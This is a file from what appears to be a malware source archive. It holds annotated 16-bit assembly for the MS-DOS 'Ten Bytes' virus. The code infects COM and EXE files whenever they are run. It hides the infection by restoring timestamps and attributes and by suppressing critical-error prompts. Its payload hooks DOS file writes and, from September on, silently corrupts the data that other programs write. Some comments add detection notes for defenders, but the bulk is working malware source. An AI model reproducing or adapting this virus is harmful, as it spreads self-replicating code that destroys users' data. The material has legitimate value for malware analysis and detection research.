MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.tenbytes.asm

seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
;================================================================
; Entry stub of an infected COM file (the first 20h bytes of the
; victim are replaced by this; the originals are kept at d_04F7).
; On COM entry ES holds the PSP segment; it is added to the
; segment half of the far pointer at d_010C and the far jump lands
; in the relocated virus copy.
; Detection note: the opcode bytes in the right-hand column
; (8C C0 2E 01 06 .. 2E FF 2E ..) at file offset 0 are this stub's
; byte pattern; the word at offset 2 (012Eh) is also what the
; infector tests for at l_1616 to avoid re-infection.
;----------------------------------------------------------------
start: mov ax,es ;0100 8C C0
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
;<- duplicated code (aligning to 20h bytes)
; (padding: a copy of the first bytes of s_15FE, never executed here)
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
; victim code
;..............................................................
org 1380h
;============================================================================
; Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
; COM virus Entry
; (this code is present only in case *.COM infection)
;----------------------------------------------------------------
; COM entry (offset 0 of the virus segment):
; copies the 20h saved victim bytes (d_04F7) back to cs:100h, marks
; the file type as COM in d_0349 (0FFh) and continues at the common
; entry l_18CF (offset 54Fh). DS is preserved across the copy.
; Note: the copy targets cs:100h, i.e. the virus segment, not the
; PSP segment - the restored bytes are the ones l_18E5 later jumps
; to via the 100h IP stored at d_05B4.
l_0000: push ds ;1380 1E
push cs ;1381 0E
pop ds ;1382 1F
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
mov di,100h ;1387.BF 0100
mov cx,20h ;138A B9 0020
rep movsb ;restore victim bytes ;138D F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
nop ;1395 90
pop ds ;1396 1F
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
jmp ax ;139B FF E0
;<--- duplicated fields d_033F - d_0347
; (a stale copy of the work area; the live copy is at d_033F)
dw 0020 ;139D 20 00
dw 05EAh ;139F EA 05
dw 0Bh ;13A1 0B 00
dw 28h ;13A3 28 00
dw 200h ;13A5 00 02
db 0 ;13A7 00
;===========================================================================
; Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
; Get/Set victim attribute
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13A8 - INT 21h AH=43h on the victim path at ds:[57Fh]
; In:  al = 0 get attributes / 1 set attributes (cx = new value)
;      (callers: L129/L134 in s_13FD, l_15A8)
; Out: CF set on error; on get, cx = attribute word
; Clobb: dx, ah, flags
;----------------------------------------------------------------
s_13A8 proc near
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
mov ah,43h ;get/set file attrb ;13AB B4 43
int 21h ;13AD CD 21
retn ;13AF C3
s_13A8 endp
;================================================================
; Move file ptr to EOF
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13B0 - lseek(handle, 0, SEEK_END) via INT 21h AX=4202h
; In:  handle read from cs:[9Bh] (d_009B)
; Out: dx:ax = resulting file position, i.e. the file size
; Clobb: bx, cx, flags
;----------------------------------------------------------------
s_13B0 proc near
xor cx,cx ;13B0 33 C9
xor dx,dx ;13B2 33 D2
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
int 21h ;13BC CD 21
retn ;13BE C3
s_13B0 endp
;================================================================
; Read 32 bytes into buffer
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13BF - read the first 20h bytes of the victim into d_04F7
; (ds:[4F7h]), the buffer the entry stubs later restore from.
; Out: ax = cx = bytes read; CF set on error (not checked by the
;      caller, which inspects the 'MZ' word right away)
; Clobb: bx, dx, flags
;----------------------------------------------------------------
s_13BF proc near
mov cx,20h ;13BF B9 0020
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
mov ah,3Fh ;read file ;13CA B4 3F
int 21h ;13CC CD 21
mov cx,ax ;bytes read ;13CE 8B C8
retn ;13D0 C3
s_13BF endp
;================================================================
; Write 32 B into file
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13D1 - write the 20h bytes at ds:[4F7h] to the current file
; position (the caller has just seeked to BOF).
; ES is set to 8 first: the resident write hook s_1727 treats
; ES=8 as "this is the virus writing" and leaves the call alone,
; so the corruption payload never hits the infector's own writes.
; Out: ax = cx = bytes written; CF set on error
; Clobb: es, bx, dx, flags
;----------------------------------------------------------------
s_13D1 proc near
mov ax,8 ;switch off destruction ;13D1 B8 0008
mov es,ax ;13D4 8E C0
mov cx,20h ;13D6 B9 0020
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
mov ah,40h ;write file cx=bytes ;13E1 B4 40
int 21h ;13E3 CD 21
mov cx,ax ;13E5 8B C8
retn ;13E7 C3
s_13D1 endp
;================================================================
; Calculate virus length
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13E8 - store the length of the file-type-independent part of
; the virus (612h - 28h = 5EAh, matching the initial value of
; d_0341) into ds:[341h]. Used as the byte count by s_15FE.
; Clobb: ax, dx, flags
;----------------------------------------------------------------
s_13E8 proc near
mov ax,612h ;virus code length ;13E8 B8 0612
mov dx,28h ;file type depended code;13EB BA 0028
sub ax,dx ;13EE 2B C2
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
retn ;13F3 C3
s_13E8 endp
;================================================================
; Get/Set file date & time
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13F4 - INT 21h AH=57h on the open victim handle
; In:  al = 0 get / 1 set; when setting, cx = time, dx = date
; Out: on get, cx = time, dx = date; CF set on error
; The infector saves these before writing and restores them in
; l_15A8, so the file's timestamp does not change - a modified-time
; check alone will not reveal an infection.
;----------------------------------------------------------------
s_13F4 proc near
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
mov ah,57h ;get/set file date & time ;13F8 B4 57
int 21h ;13FA CD 21
retn ;13FC C3
s_13F4 endp
;================================================================
; Contaminate file - master routine
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_13FD - infect the file named at ds:[57Fh]
; In:  ds = cs (set by the caller s_1769)
; Flow: read attributes -> set archive only -> open r/w -> save
;       date/time -> read first 20h bytes -> 'MZ' ? EXE branch
;       (l_146F) : COM branch (l_1616) -> l_15A8 restores the
;       timestamp and attributes and closes the handle.
; State: d_009B handle, d_00E8/d_00ED timestamp, work area
;        d_033F..d_0349 (attributes, const length, alignment bytes,
;        virus segment, header size, file type).
; Defender notes: every file write below sets ES=8, the marker the
; resident write hook s_1727 uses to exempt the virus' own writes;
; attributes and timestamp are put back afterwards, so look for the
; content markers instead (EXE: checksum word == -(last page bytes),
; COM: word 012Eh at offset 2) or for the stub byte patterns.
;----------------------------------------------------------------
s_13FD proc near
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
nop ;1402 90
mov al,0 ;1403 B0 00
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
jc l_146A ;-> EXIT ;1408 72 60
mov ds:[33Fh],cx ;l_16BF orig. file attr ;140A 89 0E 033F
; 20h = archive bit only: read-only/hidden/system are cleared so the
; open for write succeeds; the original word is restored at l_15A8
mov cx,20h ;140E B9 0020
mov al,1 ;1411 B0 01
call s_13A8 ;Set victim attribute ;1413 E8 FF92
jc l_146A ;-> EXIT ;1416 72 52
jmp short l_1421 ;1418 EB 07
nop ;141A 90
; per-file variables embedded in the code stream
d_009B dw 0005h ;file handle ;141B 05 00
d_009D dw 0400h ;141D 00 04
d_009F dw 057Fh ;filepath address ;141F 7F 05
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
mov ax,400h ;142C B8 0400
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
mov al,2 ;open mode 2 = read/write ;1432 B0 02
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
int 21h ;1436 CD 21
; handle defaults to 0FFFFh, overwritten only when the open succeeded
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
jc l_1443 ;143E 72 03
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
cmp ax,0FFFFh ;1446 3D FFFF
je l_146A ;-> EXIT, open file err ;1449 74 1F
mov al,0 ;144B B0 00
call s_13F4 ;Get file date & time ;144D E8 FFA4
jc l_148F ;-> err, close & exit ;1450 72 3D
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
; file type is decided by content ('MZ'), not by extension
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
je l_146F ;-> yes, EXE ;1463 74 0A
jmp l_1616 ;-> no, COM ;1465 E9 01AE
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
l_146A: jmp l_15C6 ;146A E9 0159
d_00ED dw 0001h ;victim time ;146D 01 00
;================================================================
; EXE file contamination
; Rewrites the MZ header in the d_04F7 buffer (entry CS:IP, SS:SP,
; page count, last-page size, checksum) and appends the virus after
; the paragraph-aligned end of the image.
;----------------------------------------------------------------
; infection marker: checksum field (+12h) holds -(last page bytes),
; written at l_155A below; equal -> skip
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
neg ax ;1472 F7 D8
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
je l_148F ;-> already infected ;1478 74 15
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
cmp ax,3 ;147D 3D 0003
jb l_148F ;-> file too small ;1480 72 0D
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
mov cl,4 ;1485 B1 04
shl ax,cl ;1487 D3 E0
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
jmp short l_1492 ;148C EB 04
nop ;148E 90
l_148F: jmp l_15A8 ;148F E9 0116
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
; dx:ax = file size; kept on the stack until the page count is
; recomputed at L244-L245
push ax ;14A1 50
push dx ;14A2 52
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
sbb dx,0 ;14A7 83 DA 00
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
cmp dx,0 ;14B1 83 FA 00
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
ja l_14D3 ;-> more then 28h length;14BA 77 17
;<- EXE code length =< 28h
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
sub bx,ax ;28h - file length ;14C6 2B D8
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
jmp short l_1511 ;14D0 EB 3F
nop ;14D2 90
; image length (excluding the header) minus 28h, then reduced to
; paragraphs; the remainder decides how many alignment bytes (0 or
; 10h-r) are appended before the virus body
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
sbb dx,0 ;14D7 83 DA 00
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
and ax,0Fh ;14DD 25 000F
cmp ax,0 ;14E0 3D 0000
jne l_14F9 ;-> need alignment ;14E3 75 14
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
mov cx,10h ;14EE B9 0010
div cx ;14F1 F7 F1
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
jmp short l_1511 ;14F6 EB 19
db 90h ;14F8 90
;<---- need alignment
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
mov cx,10h ;1506 B9 0010
div cx ;1509 F7 F1
add ax,1 ;+ alignment paragraph ;150B 05 0001
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
; swap the header's CS/SS/SP with the virus' own, saving the victim
; values in d_05B6 / d_05A1 / d_05A3 for l_1953 to restore
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
push ax ;151D 50
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
pop ax ;1524 58
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
add ax,1Eh ;virus stack ;1532 05 001E
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
call s_13E8 ;Calculate virus length ;153C E8 FEA9
; new size = old size + const length + alignment bytes, expressed
; as 200h-byte pages (+4) and last-page remainder (+2)
pop dx ;<- victim EOF ;153F 5A
pop ax ;1540 58
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
adc dx,0 ;1545 83 D2 00
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
adc dx,0 ;154C 83 D2 00
mov cx,200h ;page length ;154F B9 0200
div cx ;1552 F7 F1
cmp dx,0 ;1554 83 FA 00
je l_155A ;1557 74 01
inc ax ;1559 40
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
; the infection marker checked at l_146F is written here
neg dx ;1561 F7 DA
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
jb l_1580 ;1573 72 0B
;<- file begins with jump
; with >= 3 alignment bytes the entry IP points into them and a
; short/near jmp (d_054B) written by s_15C7 reaches l_18CF
mov cx,28h ;1575 B9 0028
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
jc l_15A8 ;-> error, EXIT ;1586 72 20
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
sub cx,3 ;jmp instruction length ;158C 83 E9 03
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
mov bx,28h ;beginning of code ;1592 BB 0028
sub ax,bx ;jmp distance ;1595 2B C3
add cx,ax ;aligning bytes ;1597 03 C8
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
jc l_15A8 ;-> error, EXIT ;15A3 72 03
call s_15FE ;Write const part of vir;15A5 E8 0056
;================================================================
; End of contamination (common to EXE & COM)
; Restores timestamp and attributes and closes the handle; errors
; from the set calls are not checked.
;----------------------------------------------------------------
l_15A8: mov al,1 ;to set ;15A8 B0 01
; NOTE(review): the doubled `ds:ds:` prefix is an assembler artifact;
; the listed bytes (8B 16 00E8 / 8B 0E 00ED) carry no override
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
call s_13F4 ;Set file date & time ;15B2 E8 FE3F
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
mov ah,3Eh ;close file ;15B9 B4 3E
int 21h ;15BB CD 21
mov al,1 ;to set ;15BD B0 01
mov cx,ds:[33Fh] ;l_16BF orig. file attr ;15BF 8B 0E 033F
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
l_15C6: retn ;15C6 C3
;================================================================
; Align end of file to paragraphs
; Writes d_0343 bytes taken from d_054B (jmp opcode + distance +
; pad) at the current position; ES=8 exempts it from the write hook.
; Out: ax = cx = bytes written; CF set on error
;----------------------------------------------------------------
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
mov es,ax ;15CA 8E C0
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
mov ah,40h ;write file ;15D8 B4 40
int 21h ;15DA CD 21
mov cx,ax ;15DC 8B C8
retn ;15DE C3
;================================================================
; Set file pointer to BOF (INT 21h AX=4200h, cx:dx = 0)
;----------------------------------------------------------------
s_15DF: xor cx,cx ;15DF 33 C9
xor dx,dx ;15E1 33 D2
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
int 21h ;15EB CD 21
retn ;15ED C3
;================================================================
; COM virus start code pattern
; Image of the stub written over the first 20h bytes of a COM
; victim (same bytes as `start`); d_027C receives the computed
; virus segment before the write at L363-L370.
;----------------------------------------------------------------
d_026E: mov ax,es ;15EE 8C C0
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
d_027A dw 0 ;15FA 00 00
d_027C dw 0138h ;15FC 38 01
;================================================================
; Write constant part of virus
; Appends d_0341 bytes starting at virus offset 28h (everything
; after the file-type-specific entry); ES=8 exempts the write.
; Out: ax = cx = bytes written; CF set on error
;----------------------------------------------------------------
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
mov es,ax ;1601 8E C0
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
mov ah,40h ;write file ;160F B4 40
int 21h ;1611 CD 21
mov cx,ax ;1613 8B C8
retn ;1615 C3
;================================================================
; COM victim contamination
; Marker: word 012Eh at offset 2 (part of the start stub) means
; already infected. Files below 3E8h bytes or whose aligned size
; plus PSP exceeds 64 KiB are skipped. Layout written: stub at BOF,
; then at EOF alignment bytes, the 28h-byte COM entry (d_0322) and
; the constant part.
;----------------------------------------------------------------
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
je l_15A8 ;-> contaminated, EXIT ;161C 74 8A
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
jb l_169F ;-> below, EXIT ;1624 72 79
add ax,100h ;add PSP ;1626 05 0100
adc dx,0 ;1629 83 D2 00
push ax ;162C 50
and ax,0Fh ;162D 25 000F
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
cmp ax,0 ;1636 3D 0000
je l_1645 ;-> para aligned file ;1639 74 0A
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
l_1645: pop ax ;1645 58
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
adc dx,0 ;164A 83 D2 00
cmp dx,0 ;164D 83 FA 00
ja l_169F ;-> file too big, EXIT ;1650 77 4D
mov cl,4 ;1652 B1 04
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
; NOTE(review): this cmp sets flags that nothing below reads
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
mov ax,8 ;to switch off virus ;1667 B8 0008
mov es,ax ;166A 8E C0
mov cx,20h ;bytes to write ;166C B9 0020
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
mov ah,40h ;write file ;1677 B4 40
int 21h ;1679 CD 21
mov cx,ax ;bytes written ;167B 8B C8
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
call s_15C7 ;write aligning bytes ;1680 E8 FF44
mov ax,8 ;switch off virus ;1683 B8 0008
mov es,ax ;1686 8E C0
mov cx,28h ;40 bytes ;1688 B9 0028
mov dx,322h ;offset l_16A2 ;168B .BA 0322
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
mov ah,40h ;write file ;1693 B4 40
int 21h ;1695 CD 21
mov cx,ax ;bytes written ;1697 8B C8
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
call s_15FE ;Write const part of vir;169C E8 FF5F
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
s_13FD endp
;<-- COM type virus begin pattern
; Image of the COM entry (same instructions as l_0000) that s_13FD
; appends to a COM victim as the first 28h bytes of the virus copy;
; it is data here and is never executed from this location.
d_0322: push ds ;16A2 1E
push cs ;16A3 0E
pop ds ;16A4 1F
lea si,cs:[4F7h] ;16A5 8D 36 04F7
mov di,0100h ;16A9.BF 0100
mov cx,20h ;16AC B9 0020
rep movsb ;16AF F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
nop ;16B7 90
pop ds ;16B8 1F
lea ax,cs:[54Fh] ;16B9 8D 06 054F
jmp ax ;16BD FF E0
;------ work area
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
d_0345 dw 28h ;16C5 28 00
d_0347 dw 200h ;size of header ;16C7 00 02
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
;================================================================
; init registers
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_16CA - zero si, di, ax, dx, bp before control is handed to the
; victim (called from l_18E5 and l_1953). bx, cx are not touched.
;----------------------------------------------------------------
s_16CA proc near
xor si,si ;16CA 33 F6
xor di,di ;16CC 33 FF
xor ax,ax ;16CE 33 C0
xor dx,dx ;16D0 33 D2
xor bp,bp ;16D2 33 ED
retn ;16D4 C3
s_16CA endp
;================================================================
; int 24h handling routine (infection time active only)
;----------------------------------------------------------------
; Temporary INT 24h (critical error) handler, installed by s_16E6
; only while a file is being infected. On INT 24h entry DI carries
; the error code; when it is 0 the handler answers AL=3 (the DOS
; "fail" return code) itself, so no "Abort, Retry, Fail?" prompt
; appears for the virus' file access; any other error is passed to
; the saved original handler at d_0362.
; Defender note: a program that swaps INT 24h around its own file
; writes and restores it right after is a classic stealth indicator.
l_16D5: cmp di,0 ;16D5 83 FF 00
jne l_16DD ;16D8 75 03
mov al,3 ;fail the operation silently ;16DA B0 03
iret ;16DC CF
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
d_0362 dw 0556h,0DF0h ;saved int 24h vector (offset,segment) ;16E2 56 05 F0 0D
;================================================================
; Get int 24h
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_16E6 - hook INT 24h by writing the IVT directly (0:90h/92h)
; In:  ax = cs (set by the caller s_1769; stored unchanged as the
;      new handler segment - ax is not modified here)
; Saves the old vector to d_0362, points the entry at l_16D5.
; Undone by s_170C. Bypasses INT 21h AH=25h/35h, so a hook on the
; DOS vector services would not see this change.
; Clobb: bx, es, flags (interrupts disabled during the swap)
;----------------------------------------------------------------
s_16E6 proc near
cli ; Disable interrupts ;16E6 FA
xor bx,bx ;16E7 33 DB
mov es,bx ;16E9 8E C3
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
sti ;170A FB
retn ;170B C3
s_16E6 endp
;================================================================
; Restore int 24h vector
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_170C - put the INT 24h vector saved in d_0362 back into the IVT
; (counterpart of s_16E6). Clobb: bx, es, flags
;----------------------------------------------------------------
s_170C proc near
cli ;170C FA
xor bx,bx ;170D 33 DB
mov es,bx ;170F 8E C3
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
mov es:[90h],bx ;1716 26: 89 1E 0090
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
mov es:[92h],bx ;1720 26: 89 1E 0092
sti ;1725 FB
retn ;1726 C3
s_170C endp
;===============================================================
; write handle service routine (destruction routine)
;---------------------------------------------------------------
;---------------------------------------------------------------
; s_1727 - payload, run from the INT 21h hook for every AH=40h
; (write handle) call.
; Exempt: ES=8 (the virus' own writes, see s_13D1) and bx<4 (the
; standard device handles). Otherwise it reads the date (AH=2Ah:
; dh = month) and, from September on, returns with DX advanced by
; 0Ah, so the application's write proceeds from a shifted buffer -
; silent corruption of the data written by ordinary programs.
; All other registers are preserved.
; Defender note: the trigger is date-only; it leaves no marker in
; the files it damages, so hook detection (see s_17BB) and write
; verification are the practical countermeasures.
;---------------------------------------------------------------
s_1727 proc near
push ax ;1727 50
push bx ;1728 53
push cx ;1729 51
push dx ;172A 52
push es ;172B 06
push ds ;172C 1E
push si ;172D 56
push di ;172E 57
mov ax,es ;172F 8C C0
cmp ax,8 ;1731 3D 0008
je l_1750 ;-> virus contamination ;1734 74 1A
cmp bx,4 ;1736 83 FB 04
jb l_1750 ;-> standard handles ;1739 72 15
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
int 21h ;173D CD 21
cmp dh,9 ;september ? ;173F 80 FE 09
jb l_1750 ;-> before september ;1742 72 0C
pop di ;1744 5F
pop si ;1745 5E
pop ds ;1746 1F
pop es ;1747 07
pop dx ;1748 5A
pop cx ;1749 59
pop bx ;174A 5B
pop ax ;174B 58
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
retn ;174F C3
l_1750: pop di ;1750 5F
pop si ;1751 5E
pop ds ;1752 1F
pop es ;1753 07
pop dx ;1754 5A
pop cx ;1755 59
pop bx ;1756 5B
pop ax ;1757 58
retn ;1758 C3
s_1727 endp
db 16 dup (0) ;not used ;1759 0010[00]
;================================================================
; Load & Execute service routine
;----------------------------------------------------------------
;----------------------------------------------------------------
; s_1769 - run from the INT 21h hook for AH=4Bh (load & execute):
; infects the program about to be started.
; In:  ds:dx = pathname (the caller's INT 21h arguments)
; Copies 19h bytes of the path to cs:[57Fh] (fixed length, so the
; name is truncated or over-read past its terminator), hooks
; INT 24h, calls s_13FD with ds = cs, restores INT 24h.
; All registers are preserved for the original INT 21h service.
;----------------------------------------------------------------
s_1769 proc near
push ax ;1769 50
push bx ;176A 53
push cx ;176B 51
push dx ;176C 52
push es ;176D 06
push ds ;176E 1E
push si ;176F 56
push di ;1770 57
mov si,dx ;file pathname ;1771 8B F2
mov ax,cs ;1773 8C C8
mov es,ax ;1775 8E C0
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
mov cx,19h ;177A B9 0019
rep movsb ;copy victim name ;177D F3/ A4
; ax still = cs here: s_16E6 does not touch ax and stores it as
; the new INT 24h segment
call s_16E6 ;Get int 24h vector ;177F E8 FF64
mov ds,ax ;ds:=cs ;1782 8E D8
call s_13FD ;1784 E8 FC76
call s_170C ;Restore int 24h vector ;1787 E8 FF82
pop di ;178A 5F
pop si ;178B 5E
pop ds ;178C 1F
pop es ;178D 07
pop dx ;178E 5A
pop cx ;178F 59
pop bx ;1790 5B
